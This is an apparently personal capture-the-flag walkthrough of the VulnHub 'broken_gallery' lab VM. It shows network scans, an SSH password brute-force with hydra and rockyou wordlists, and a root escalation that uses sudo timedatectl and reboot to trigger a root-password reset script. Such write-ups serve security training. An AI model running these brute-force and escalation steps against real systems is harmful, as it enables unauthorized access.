By retrymp3, Instagram @retrymp3
Running netdiscover to view the machine ip
Currently scanning: 192.168.23.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
192.168.8.1 5c:a8:6a:d8:13:15 1 60 HUAWEI TECHNOLOGIES CO.,LTD
192.168.8.101 e8:d0:fc:87:53:03 1 60 Liteon Technology Corporation
192.168.8.104 08:00:27:8b:e1:b6 1 60 PCS Systemtechnik GmbH
Scanning for ports and services,
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 39:5e:bf:8a:49:a3:13:fa:0d:34:b8:db:26:57:79:a7 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCsDP1G9p8pMW+TiKn0Exn6d2tGTTPGrKsIAlCWxUoZu/Jz+teqiDxZoQArXlhK/SgXXJv6ufJHMcgWhFOdGG/8Jfm46M7qURTWqTER5f7aNimHTvcBB/Zcnr1cSE+Yt3UgeguQ2VBTqPnESNjIinj5f7OrEJCG6Uvf221Wijzvb6KrYv5LNfrh8UJJ6ieis13aqvjwN1MQdKwMWYAV/2aPLME59TVyqneRDOvFZRDEPMHGJB3ZoNrlNudDf6UqZuLViplnkaN+SuxAWNXYG+g1fA578fNVIzI7bHAYDbCGFZh87TLKHvJvgqlWLDQvo8irzHlWvIpehvbpthnGIG0V
| 256 20:d7:72:be:30:6a:27:14:e1:e6:c2:16:7a:40:c8:52 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOedB//c64utUEo+gsmsh26dzZa0eMsc83InMyXD0rEepjTXqxbplJWFzx3rQSElxwdql+BsaQBI9qg+XROp9ZQ=
| 256 84:a0:9a:59:61:2a:b7:1e:dd:6e:da:3b:91:f9:a0:c6 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIwpzv0aEpNMhO0avZsZ46zXc0aPO2V+867IaJkhJuSN
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.18
| http-ls: Volume /
| SIZE TIME FILENAME
| 55K 2019–08–09 01:20 README.md
| 1.1K 2019–08–09 01:21 gallery.html
| 259K 2019–08–09 01:11 img_5terre.jpg
| 114K 2019–08–09 01:11 img_forest.jpg
| 663K 2019–08–09 01:11 img_lights.jpg
| 8.4K 2019–08–09 01:11 img_mountains.jpg
|_
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Index of /
MAC Address: 08:00:27:8B:E1:B6 (Oracle VirtualBox virtual NIC)
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Port 80 and 22 are open. From the output, we can see the file listings inside the website.
Lot of enumeration is needed for this, I tried directory brute forcing but got nothing worthwhile.
Since the only visible login to me was through ssh, I tried to bruteforce the password and username using hydra.
root@injmush:~/Desktop/vulnhub.vbox/broken_gallery# hydra -L /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt 192.168.8.104 ssh
Hydra v9.0 © 2019 by van Hauser/THC — Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020–06–20 10:00:23
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort… (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking ssh://192.168.8.104:22/
[22][ssh] host: 192.168.8.104 login: broken password: broken
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020–06–20 10:00:34
Success! I found the password for ssh login.
broken:broken
Now logging in through ssh
root@injmush:~/Desktop/vulnhub.vbox/broken_gallery# ssh broken@192.168.8.104
he authenticity of host ‘192.168.8.104 (192.168.8.104)’ can’t be established.
ECDSA key fingerprint is SHA256:6iK6MbJOGAwgxFmxooFsdDj4+MUBHpeR4l54CPQQGhQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added ‘192.168.8.104’ (ECDSA) to the list of known hosts.
broken@192.168.8.104’s password:
Welcome to Ubuntu 16.04 LTS (GNU/Linux 4.4.0–21-generic x86_64)
* Documentation: https://help.ubuntu.com/
762 packages can be updated.
458 updates are security updates.
New release ‘18.04.4 LTS’ available.
Run ‘do-release-upgrade’ to upgrade to it.
Last login: Fri Aug 9 02:40:48 2019 from 10.11.1.221
broken@ubuntu:~$
I checked if user broken has sudo rights
broken@ubuntu:~$ sudo -l
Matching Defaults entries for broken on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User broken may run the following commands on ubuntu:
(ALL) NOPASSWD: /usr/bin/timedatectl
(ALL) NOPASSWD: /sbin/reboot
So the user can run reboot and timedatectl command as root.
But I checked the gtfo bins and found nothing. Then I listed the directory and found that the .bash_history has some things stored in it.
broken@ubuntu:~$ ls -la
total 124
drwxr-xr-x 17 broken broken 4096 Aug 9 2019 .
drwxr-xr-x 3 root root 4096 Aug 9 2019 ..
-rw — — — — 1 broken broken 3670 Jan 1 2018 .bash_history
-rw-r — r — 1 broken broken 220 Aug 9 2019 .bash_logout
-rw-r — r — 1 broken broken 3771 Aug 9 2019 .bashrc
drwx — — — 14 broken broken 4096 Aug 9 2019 .cache
drwx — — — 17 broken broken 4096 Aug 9 2019 .config
drwx — — — 3 root root 4096 Aug 9 2019 .dbus
drwxr-xr-x 2 broken broken 4096 Aug 9 2019 Desktop
-rw-r — r — 1 broken broken 25 Aug 9 2019 .dmrc
drwxr-xr-x 2 broken broken 4096 Aug 9 2019 Documents
drwxr-xr-x 2 broken broken 4096 Aug 9 2019 Downloads
-rw-r — r — 1 broken broken 8980 Aug 9 2019 examples.desktop
drwx — — — 2 broken broken 4096 Aug 9 2019 .gconf
drwx — — — 3 broken broken 4096 Aug 9 2019 .gnupg
-rw — — — — 1 broken broken 636 Aug 9 2019 .ICEauthority
drwx — — — 3 broken broken 4096 Aug 9 2019 .local
drwx — — — 4 broken broken 4096 Aug 9 2019 .mozilla
drwxr-xr-x 2 broken broken 4096 Aug 9 2019 Music
drwxr-xr-x 2 broken broken 4096 Aug 9 2019 Pictures
-rw-r — r — 1 broken broken 675 Aug 9 2019 .profile
drwxr-xr-x 2 broken broken 4096 Aug 9 2019 Public
-rw-r — r — 1 broken broken 0 Aug 9 2019 .sudo_as_admin_successful
drwxr-xr-x 2 broken broken 4096 Aug 9 2019 Templates
drwxr-xr-x 2 broken broken 4096 Aug 9 2019 Videos
-rw — — — — 1 broken broken 5412 Aug 8 2019 .viminfo
-rw — — — — 1 broken broken 51 Aug 9 2019 .Xauthority
-rw — — — — 1 broken broken 1234 Aug 9 2019 .xsession-errors
-rw — — — — 1 broken broken 1244 Aug 8 2019 .xsession-errors.old
So I concatenated the file to see the previous commands run on this machine.
broken@ubuntu:~$ cat .bash_history
timedatectl set-time ‘2019–08–08 13:45’
date
cd /etc/init.d/
cat password-policy.sh
./password-policy.sh
date
reboot
cat /etc/init.d/password-policy.sh
We can see that a script named password-policy.sh is being executed upon reboot, because it’s in the /etc/init.d/ directory. Unfortunately there isn’t any write permission on the file. But it’s owned by root and can be executed by anyone.
So I concatenate the file to see if there are any child process being called by this script.
broken@ubuntu:~$ cat /etc/init.d/password-policy.sh
#!/bin/bash
DAYOFWEEK=$(date +”%u”)
echo DAYOFWEEK: $DAYOFWEEK
if [ “$DAYOFWEEK” -eq 4 ]
then
sudo sh -c ‘echo root:TodayIsAgoodDay | chpasswd’
fi
#if [ “$DAYOFWEEK” == 4 ]
So the script says if dayofweek = 4 , then the password for root will be changed to TodayIsAgoodDay. So to change the date on the whole system so that today is the 4th day of the week and rebooting the system so that the password-policy.sh script gets executed and the password is changed.
broken@ubuntu:~$ sudo timedatectl set-time ‘2020–6–18 10:00:00’
The date 2020–6–18 is a thursday, which is the fourth day of the week. Hence the script will get executed upon reboot.
broken@ubuntu:~$ sudo /sbin/reboot
Connection to 192.168.8.104 closed by remote host.
Connection to 192.168.8.104 closed.
Logging in again
root@injmush:~/Desktop/vulnhub.vbox/broken_gallery# ssh broken@192.168.8.104
broken@ubuntu:~$ su
Password:TodayIsAgoodDay
root@ubuntu:/home/broken# id
uid=0(root) gid=0(root) groups=0(root)